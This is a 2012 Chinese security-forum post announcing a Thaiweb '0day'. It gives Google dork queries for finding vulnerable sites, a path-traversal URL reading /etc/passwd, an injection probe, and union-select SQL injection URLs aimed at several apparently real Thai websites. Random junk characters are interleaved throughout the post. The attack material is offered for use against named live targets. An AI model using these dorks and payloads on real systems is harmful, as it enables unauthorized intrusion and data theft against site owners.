找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2068|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
Google之:
3 j, k( l  U' z5 f! D( |( u
$ ?0 M$ Y( I# X  w$ K7 ?/ R" k: Zintext:powered by Thaiweb
0 ~. I& ~4 k* i% y# b/ D) G) F# P
inurl:index.php?page=board.php
) o1 Z, w8 I: E& K5 ?# C! K0 u) f  ]

+ E8 Y1 ~4 V" _: k/ F+ [5 P3 W% c
( y7 v9 W) L; i& ^  f6 k利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
4 b4 r, c: X  [9 X* k5 ~  s' R0 ^3 O6 v& ^; O( ~. K
- X& s' P1 @. Q# }

& M5 z" H0 W8 v2 \: R$ y利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'+ ?, t7 @4 y) Q3 K" \; M

, m  @, W# R, u  i0 b! T) r & t4 ^: V" _$ ]3 M
6 {0 z3 H5 u5 w1 f; x  Q) Y8 {8 h1 G
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
9 ~* X+ X/ r$ L2 p" W  t% |( \8 j  e# l7 g( o
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
. W8 P' f- e" ~  ]8 o/ s! M8 L, H
8 r8 P: S' @2 `: E, U9 }http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--8 g  n9 a0 _+ ?2 r, m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表